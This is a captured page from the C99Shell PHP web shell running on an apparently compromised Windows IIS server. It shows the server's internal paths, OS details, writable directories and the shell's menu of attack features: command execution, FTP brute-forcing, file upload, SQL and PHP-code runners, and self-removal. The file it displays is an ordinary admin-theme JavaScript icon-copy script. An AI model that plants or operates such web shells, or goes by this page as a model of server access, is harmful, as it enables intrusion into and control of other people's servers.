!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Microsoft-IIS/10.0. PHP/7.4.33 

uname -a: Windows NT LAKE 10.0 build 20348 (Windows Server 2016) AMD64 

IWPD_801(traduongco) 

Safe-mode: OFF (not secure)

D:\vhosts\traduong.com.vn\admin.traduong.com.vn\Content\admin\assets\es6\pages\   drwxrwxrwx
Free 184.58 GB of 400 GB (46.15%)
Detected drives: [ a ] [ c ] [ d ] [ e ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     icon.js (1.82 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
class Icon {

    static init() {
        function copy(value)  {
            const promise = new Promise((resolve) => {
                let copyTextArea = null;
                try {
                    copyTextArea = document.createElement("textarea");
                    copyTextArea.style.height = '0px';
                    copyTextArea.style.opacity = '0';
                    copyTextArea.style.width = '0px';
                    document.body.appendChild(copyTextArea);
                    copyTextArea.value = value;
                    copyTextArea.select();
                    document.execCommand('copy');
                    resolve(value);
                } finally {
                    if (copyTextArea && copyTextArea.parentNode) {
                        copyTextArea.parentNode.removeChild(copyTextArea);
                    }
                }
            });
    
            return (promise);
        }

        function showToast() {
            var toastHTML = `<div class="toast fade hide" data-delay="1500">
                <div class="toast-body">
                    <i class="anticon anticon-check-o text-success"></i>
                    <span class="ml-1">Copied</span>
                </div>
            </div>`
        
            $('#notification-toast').append(toastHTML)
            $('#notification-toast .toast').toast('show');
            setTimeout(function(){ 
                $('#notification-toast .toast:first-child').remove();
            }, 1500);
        }

        $('.icons-list li').on('click', (e) => {
            const $this = $(e.currentTarget);
            const copiedString = $this.children('.icon-wrap').html()
            copy(copiedString).then(() => {
                showToast()
            });
        })
    }
    
}

$(() => { Icon.init(); });


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 1.5623 ]--